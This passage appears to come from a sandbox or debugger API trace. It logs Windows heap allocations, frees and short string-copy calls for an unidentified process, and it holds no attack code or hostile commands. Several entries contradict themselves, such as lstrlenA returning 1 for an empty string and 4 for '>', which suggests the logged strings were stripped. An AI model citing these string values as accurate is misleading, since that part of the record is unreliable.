0x617110 [0186.867] GetProcessHeap () returned 0x560000 [0186.868] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617110, Size=0x11) returned 0x615ec0 [0186.868] GetProcessHeap () returned 0x560000 [0186.868] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.868] lstrlenA (lpString=">") returned 1 [0186.868] GetProcessHeap () returned 0x560000 [0186.868] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x6171e0 [0186.868] lstrcpyA (in: lpString1=0x6171e0, lpString2=">" | out: lpString1=">") returned=">" [0186.868] lstrlenA (lpString="") returned 1 [0186.869] GetProcessHeap () returned 0x560000 [0186.869] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617130 [0186.869] lstrcpyA (in: lpString1=0x617130, lpString2=">" | out: lpString1=">") returned=">" [0186.869] lstrlenA (lpString=">") returned 4 [0186.869] GetProcessHeap () returned 0x560000 [0186.869] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617100 [0186.869] lstrcpyA (in: lpString1=0x617100, lpString2=">" | out: lpString1=">") returned=">" [0186.869] GetProcessHeap () returned 0x560000 [0186.869] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.869] GetProcessHeap () returned 0x560000 [0186.869] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0186.869] GetProcessHeap () returned 0x560000 [0186.869] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615c60 | out: hHeap=0x560000) returned 1 [0186.870] GetProcessHeap () returned 0x560000 [0186.870] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615d20 | out: hHeap=0x560000) returned 1 [0186.870] GetProcessHeap () returned 0x560000 [0186.870] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ec0 | out: hHeap=0x560000) returned 1 [0186.870] GetProcessHeap () returned 0x560000 [0186.870] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.870] GetProcessHeap () returned 0x560000 [0186.870] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x17) returned 0x615ea0 [0186.870] GetProcessHeap () returned 0x560000 [0186.870] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617130 [0186.870] lstrlenA (lpString="<") returned 1 [0186.870] GetProcessHeap () returned 0x560000 [0186.870] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617210 [0186.870] lstrcpyA (in: lpString1=0x617210, lpString2="<" | out: lpString1="<") returned="<" [0186.870] GetProcessHeap () returned 0x560000 [0186.870] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617100 [0186.870] GetProcessHeap () returned 0x560000 [0186.870] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617100, Size=0x11) returned 0x615d60 [0186.870] GetProcessHeap () returned 0x560000 [0186.870] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.870] lstrlenA (lpString=">") returned 1 [0186.870] GetProcessHeap () returned 0x560000 [0186.870] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617100 [0186.870] lstrcpyA (in: lpString1=0x617100, lpString2=">" | out: lpString1=">") returned=">" [0186.870] lstrlenA (lpString="") returned 1 [0186.872] GetProcessHeap () returned 0x560000 [0186.872] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617100 [0186.872] lstrcpyA (in: lpString1=0x617100, lpString2=">" | out: lpString1=">") returned=">" [0186.872] lstrlenA (lpString=">") returned 4 [0186.872] GetProcessHeap () returned 0x560000 [0186.872] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617250 [0186.872] lstrcpyA (in: lpString1=0x617250, lpString2=">" | out: lpString1=">") returned=">" [0186.872] GetProcessHeap () returned 0x560000 [0186.872] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.872] GetProcessHeap () returned 0x560000 [0186.872] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.872] GetProcessHeap () returned 0x560000 [0186.872] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f00 | out: hHeap=0x560000) returned 1 [0186.872] GetProcessHeap () returned 0x560000 [0186.872] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x560000) returned 1 [0186.872] GetProcessHeap () returned 0x560000 [0186.872] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615d60 | out: hHeap=0x560000) returned 1 [0186.872] GetProcessHeap () returned 0x560000 [0186.872] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0186.872] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x90) returned 0x611f60 [0186.872] GetProcessHeap () returned 0x560000 [0186.872] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615fe0 [0186.872] GetProcessHeap () returned 0x560000 [0186.872] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615dc0 [0186.872] GetProcessHeap () returned 0x560000 [0186.872] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1b) returned 0x615f60 [0186.872] GetProcessHeap () returned 0x560000 [0186.872] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x18) returned 0x615ca0 [0186.872] GetProcessHeap () returned 0x560000 [0186.872] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615cc0 [0186.872] GetProcessHeap () returned 0x560000 [0186.872] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1a) returned 0x615ee0 [0186.872] GetProcessHeap () returned 0x560000 [0186.872] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x17) returned 0x615c60 [0186.872] GetProcessHeap () returned 0x560000 [0186.872] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ce0 | out: hHeap=0x560000) returned 1 [0186.872] GetProcessHeap () returned 0x560000 [0186.872] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615de0 | out: hHeap=0x560000) returned 1 [0186.873] GetProcessHeap () returned 0x560000 [0186.873] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615c80 | out: hHeap=0x560000) returned 1 [0186.873] GetProcessHeap () returned 0x560000 [0186.873] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615d00 | out: hHeap=0x560000) returned 1 [0186.873] GetProcessHeap () returned 0x560000 [0186.873] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.873] GetProcessHeap () returned 0x560000 [0186.873] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x560000) returned 1 [0186.873] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6198f0 | out: hHeap=0x560000) returned 1 [0186.873] GetProcessHeap () returned 0x560000 [0186.873] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617250 [0186.873] lstrlenA (lpString="<") returned 1 [0186.873] GetProcessHeap () returned 0x560000 [0186.873] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617190 [0186.873] lstrcpyA (in: lpString1=0x617190, lpString2="<" | out: lpString1="<") returned="<" [0186.873] GetProcessHeap () returned 0x560000 [0186.873] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617100 [0186.873] GetProcessHeap () returned 0x560000 [0186.873] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617100, Size=0x11) returned 0x615a40 [0186.873] GetProcessHeap () returned 0x560000 [0186.873] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617190 | out: hHeap=0x560000) returned 1 [0186.873] lstrlenA (lpString=">") returned 1 [0186.873] GetProcessHeap () returned 0x560000 [0186.873] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617080 [0186.873] lstrcpyA (in: lpString1=0x617080, lpString2=">" | out: lpString1=">") returned=">" [0186.873] lstrlenA (lpString="") returned 1 [0186.877] GetProcessHeap () returned 0x560000 [0186.877] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617180 [0186.877] lstrcpyA (in: lpString1=0x617180, lpString2=">" | out: lpString1=">") returned=">" [0186.877] lstrlenA (lpString=">") returned 4 [0186.877] GetProcessHeap () returned 0x560000 [0186.877] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617080 [0186.877] lstrcpyA (in: lpString1=0x617080, lpString2=">" | out: lpString1=">") returned=">" [0186.877] GetProcessHeap () returned 0x560000 [0186.877] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617080 | out: hHeap=0x560000) returned 1 [0186.877] GetProcessHeap () returned 0x560000 [0186.877] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.877] GetProcessHeap () returned 0x560000 [0186.877] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x560000) returned 1 [0186.877] GetProcessHeap () returned 0x560000 [0186.877] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ce0 | out: hHeap=0x560000) returned 1 [0186.877] GetProcessHeap () returned 0x560000 [0186.877] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.877] GetProcessHeap () returned 0x560000 [0186.877] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.877] GetProcessHeap () returned 0x560000 [0186.877] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1a) returned 0x615a40 [0186.877] GetProcessHeap () returned 0x560000 [0186.877] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617080 [0186.877] lstrlenA (lpString="<") returned 1 [0186.877] GetProcessHeap () returned 0x560000 [0186.877] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617180 [0186.877] lstrcpyA (in: lpString1=0x617180, lpString2="<" | out: lpString1="<") returned="<" [0186.877] GetProcessHeap () returned 0x560000 [0186.877] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617100 [0186.877] GetProcessHeap () returned 0x560000 [0186.877] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617100, Size=0x11) returned 0x615d00 [0186.877] GetProcessHeap () returned 0x560000 [0186.877] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.878] lstrlenA (lpString=">") returned 1 [0186.878] GetProcessHeap () returned 0x560000 [0186.878] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617210 [0186.878] lstrcpyA (in: lpString1=0x617210, lpString2=">" | out: lpString1=">") returned=">" [0186.878] lstrlenA (lpString="") returned 1 [0186.879] GetProcessHeap () returned 0x560000 [0186.879] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x6171d0 [0186.879] lstrcpyA (in: lpString1=0x6171d0, lpString2=">" | out: lpString1=">") returned=">" [0186.879] lstrlenA (lpString=">") returned 4 [0186.879] GetProcessHeap () returned 0x560000 [0186.879] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617180 [0186.879] lstrcpyA (in: lpString1=0x617180, lpString2=">" | out: lpString1=">") returned=">" [0186.879] GetProcessHeap () returned 0x560000 [0186.879] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.879] GetProcessHeap () returned 0x560000 [0186.879] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171d0 | out: hHeap=0x560000) returned 1 [0186.879] GetProcessHeap () returned 0x560000 [0186.879] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f00 | out: hHeap=0x560000) returned 1 [0186.879] GetProcessHeap () returned 0x560000 [0186.879] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615e60 | out: hHeap=0x560000) returned 1 [0186.879] GetProcessHeap () returned 0x560000 [0186.879] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615d00 | out: hHeap=0x560000) returned 1 [0186.880] GetProcessHeap () returned 0x560000 [0186.880] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617080 | out: hHeap=0x560000) returned 1 [0186.880] GetProcessHeap () returned 0x560000 [0186.880] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615ec0 [0186.880] GetProcessHeap () returned 0x560000 [0186.880] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617100 [0186.880] lstrlenA (lpString="<") returned 1 [0186.880] GetProcessHeap () returned 0x560000 [0186.880] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617180 [0186.880] lstrcpyA (in: lpString1=0x617180, lpString2="<" | out: lpString1="<") returned="<" [0186.880] GetProcessHeap () returned 0x560000 [0186.880] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617080 [0186.880] GetProcessHeap () returned 0x560000 [0186.880] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617080, Size=0x11) returned 0x615f40 [0186.880] GetProcessHeap () returned 0x560000 [0186.880] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.880] lstrlenA (lpString=">") returned 1 [0186.880] GetProcessHeap () returned 0x560000 [0186.880] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x6171d0 [0186.880] lstrcpyA (in: lpString1=0x6171d0, lpString2=">" | out: lpString1=">") returned=">" [0186.880] lstrlenA (lpString="") returned 1 [0186.881] GetProcessHeap () returned 0x560000 [0186.881] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617180 [0186.881] lstrcpyA (in: lpString1=0x617180, lpString2=">" | out: lpString1=">") returned=">" [0186.881] lstrlenA (lpString=">") returned 4 [0186.882] GetProcessHeap () returned 0x560000 [0186.882] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617140 [0186.882] lstrcpyA (in: lpString1=0x617140, lpString2=">" | out: lpString1=">") returned=">" [0186.882] GetProcessHeap () returned 0x560000 [0186.882] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0186.882] GetProcessHeap () returned 0x560000 [0186.882] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.882] GetProcessHeap () returned 0x560000 [0186.882] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f20 | out: hHeap=0x560000) returned 1 [0186.882] GetProcessHeap () returned 0x560000 [0186.882] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f80 | out: hHeap=0x560000) returned 1 [0186.882] GetProcessHeap () returned 0x560000 [0186.882] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f40 | out: hHeap=0x560000) returned 1 [0186.882] GetProcessHeap () returned 0x560000 [0186.882] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.882] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd0) returned 0x60e8a0 [0186.882] GetProcessHeap () returned 0x560000 [0186.882] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1a) returned 0x615ce0 [0186.882] GetProcessHeap () returned 0x560000 [0186.882] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615e80 [0186.882] GetProcessHeap () returned 0x560000 [0186.882] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1b) returned 0x615d00 [0186.882] GetProcessHeap () returned 0x560000 [0186.882] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x18) returned 0x615de0 [0186.882] GetProcessHeap () returned 0x560000 [0186.882] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615e40 [0186.882] GetProcessHeap () returned 0x560000 [0186.882] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1a) returned 0x615c80 [0186.882] GetProcessHeap () returned 0x560000 [0186.882] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x17) returned 0x615d60 [0186.882] GetProcessHeap () returned 0x560000 [0186.882] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615e60 [0186.882] GetProcessHeap () returned 0x560000 [0186.882] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1a) returned 0x615f80 [0186.882] GetProcessHeap () returned 0x560000 [0186.882] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615fa0 [0186.882] GetProcessHeap () returned 0x560000 [0186.882] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615dc0 | out: hHeap=0x560000) returned 1 [0186.883] GetProcessHeap () returned 0x560000 [0186.883] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f60 | out: hHeap=0x560000) returned 1 [0186.883] GetProcessHeap () returned 0x560000 [0186.883] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ca0 | out: hHeap=0x560000) returned 1 [0186.883] GetProcessHeap () returned 0x560000 [0186.883] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615cc0 | out: hHeap=0x560000) returned 1 [0186.883] GetProcessHeap () returned 0x560000 [0186.883] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ee0 | out: hHeap=0x560000) returned 1 [0186.883] GetProcessHeap () returned 0x560000 [0186.883] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615c60 | out: hHeap=0x560000) returned 1 [0186.883] GetProcessHeap () returned 0x560000 [0186.883] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615fe0 | out: hHeap=0x560000) returned 1 [0186.883] GetProcessHeap () returned 0x560000 [0186.883] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.883] GetProcessHeap () returned 0x560000 [0186.883] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ec0 | out: hHeap=0x560000) returned 1 [0186.883] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x611f60 | out: hHeap=0x560000) returned 1 [0186.883] GetProcessHeap () returned 0x560000 [0186.883] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x6171c0 [0186.883] lstrlenA (lpString="<") returned 1 [0186.883] GetProcessHeap () returned 0x560000 [0186.883] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617100 [0186.883] lstrcpyA (in: lpString1=0x617100, lpString2="<" | out: lpString1="<") returned="<" [0186.883] GetProcessHeap () returned 0x560000 [0186.883] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617250 [0186.883] GetProcessHeap () returned 0x560000 [0186.883] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617250, Size=0x11) returned 0x615a40 [0186.883] GetProcessHeap () returned 0x560000 [0186.883] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.883] lstrlenA (lpString=">") returned 1 [0186.883] GetProcessHeap () returned 0x560000 [0186.883] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x6171d0 [0186.883] lstrcpyA (in: lpString1=0x6171d0, lpString2=">" | out: lpString1=">") returned=">" [0186.883] lstrlenA (lpString="") returned 1 [0186.885] GetProcessHeap () returned 0x560000 [0186.885] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617120 [0186.885] lstrcpyA (in: lpString1=0x617120, lpString2=">" | out: lpString1=">") returned=">" [0186.885] lstrlenA (lpString=">") returned 4 [0186.885] GetProcessHeap () returned 0x560000 [0186.885] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617080 [0186.885] lstrcpyA (in: lpString1=0x617080, lpString2=">" | out: lpString1=">") returned=">" [0186.885] GetProcessHeap () returned 0x560000 [0186.885] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617080 | out: hHeap=0x560000) returned 1 [0186.885] GetProcessHeap () returned 0x560000 [0186.885] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617120 | out: hHeap=0x560000) returned 1 [0186.885] GetProcessHeap () returned 0x560000 [0186.885] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ec0 | out: hHeap=0x560000) returned 1 [0186.885] GetProcessHeap () returned 0x560000 [0186.885] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615fc0 | out: hHeap=0x560000) returned 1 [0186.885] GetProcessHeap () returned 0x560000 [0186.885] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.885] GetProcessHeap () returned 0x560000 [0186.885] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.885] GetProcessHeap () returned 0x560000 [0186.885] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615a40 [0186.885] GetProcessHeap () returned 0x560000 [0186.885] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617210 [0186.885] lstrlenA (lpString="<") returned 1 [0186.885] GetProcessHeap () returned 0x560000 [0186.885] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617180 [0186.885] lstrcpyA (in: lpString1=0x617180, lpString2="<" | out: lpString1="<") returned="<" [0186.885] GetProcessHeap () returned 0x560000 [0186.885] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x2) returned 0x617080 [0186.885] GetProcessHeap () returned 0x560000 [0186.885] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x617080, Size=0x11) returned 0x615d80 [0186.885] GetProcessHeap () returned 0x560000 [0186.886] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.886] lstrlenA (lpString="") returned 0 [0186.886] GetProcessHeap () returned 0x560000 [0186.886] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617250 [0186.886] lstrcpyA (in: lpString1=0x617250, lpString2="" | out: lpString1="") returned="" [0186.886] GetProcessHeap () returned 0x560000 [0186.886] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615d80 | out: hHeap=0x560000) returned 1 [0186.886] GetProcessHeap () returned 0x560000 [0186.886] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.886] GetLastError () returned 0x0 [0186.886] SetLastError (dwErrCode=0x0) [0186.886] GetProcessHeap () returned 0x560000 [0186.886] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615da0 [0186.886] GetProcessHeap () returned 0x560000 [0186.886] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615da0 | out: hHeap=0x560000) returned 1 [0186.886] GetLastError () returned 0x0 [0186.886] SetLastError (dwErrCode=0x0) [0186.886] GetProcessHeap () returned 0x560000 [0186.886] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1b) returned 0x615f40 [0186.886] GetProcessHeap () returned 0x560000 [0186.886] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x615ce0, Size=0x1b) returned 0x615cc0 [0186.886] GetProcessHeap () returned 0x560000 [0186.886] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f40 | out: hHeap=0x560000) returned 1 [0186.886] GetLastError () returned 0x0 [0186.886] SetLastError (dwErrCode=0x0) [0186.886] GetProcessHeap () returned 0x560000 [0186.886] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x18) returned 0x615e00 [0186.886] GetProcessHeap () returned 0x560000 [0186.886] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x615de0, Size=0x1b) returned 0x615d40 [0186.886] GetProcessHeap () returned 0x560000 [0186.886] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615e00 | out: hHeap=0x560000) returned 1 [0186.886] GetLastError () returned 0x0 [0186.886] SetLastError (dwErrCode=0x0) [0186.886] GetProcessHeap () returned 0x560000 [0186.886] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615fc0 [0186.887] GetProcessHeap () returned 0x560000 [0186.887] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x615e40, Size=0x1a) returned 0x615d80 [0186.887] GetProcessHeap () returned 0x560000 [0186.887] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615fc0 | out: hHeap=0x560000) returned 1 [0186.887] GetLastError () returned 0x0 [0186.887] SetLastError (dwErrCode=0x0) [0186.887] GetProcessHeap () returned 0x560000 [0186.887] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1a) returned 0x615f00 [0186.887] GetProcessHeap () returned 0x560000 [0186.887] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615f00 | out: hHeap=0x560000) returned 1 [0186.887] GetLastError () returned 0x0 [0186.887] SetLastError (dwErrCode=0x0) [0186.887] GetProcessHeap () returned 0x560000 [0186.887] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x17) returned 0x615ea0 [0186.887] GetProcessHeap () returned 0x560000 [0186.887] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x560000) returned 1 [0186.887] GetLastError () returned 0x0 [0186.887] SetLastError (dwErrCode=0x0) [0186.887] GetProcessHeap () returned 0x560000 [0186.887] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615da0 [0186.887] GetProcessHeap () returned 0x560000 [0186.887] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x615d60, Size=0x19) returned 0x615fc0 [0186.887] GetProcessHeap () returned 0x560000 [0186.887] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615da0 | out: hHeap=0x560000) returned 1 [0186.887] GetLastError () returned 0x0 [0186.887] SetLastError (dwErrCode=0x0) [0186.887] GetProcessHeap () returned 0x560000 [0186.887] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1a) returned 0x615ea0 [0186.887] GetProcessHeap () returned 0x560000 [0186.887] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x615a40, Size=0x1a) returned 0x615ca0 [0186.887] GetProcessHeap () returned 0x560000 [0186.887] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x560000) returned 1 [0186.887] GetLastError () returned 0x0 [0186.887] SetLastError (dwErrCode=0x0) [0186.887] GetProcessHeap () returned 0x560000 [0186.888] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x19) returned 0x615a40 [0186.888] GetProcessHeap () returned 0x560000 [0186.888] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.888] GetLastError () returned 0x0 [0186.888] SetLastError (dwErrCode=0x0) [0186.888] GetProcessHeap () returned 0x560000 [0186.888] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x18) returned 0x615a40 [0186.888] GetProcessHeap () returned 0x560000 [0186.888] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.888] GetLastError () returned 0x0 [0186.888] SetLastError (dwErrCode=0x0) [0186.888] GetProcessHeap () returned 0x560000 [0186.888] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1a) returned 0x615a40 [0186.888] GetProcessHeap () returned 0x560000 [0186.888] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x560000) returned 1 [0186.888] GetProcessHeap () returned 0x560000 [0186.888] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.888] GetProcessHeap () returned 0x560000 [0186.888] HeapFree (in: hHeap=0x560000, 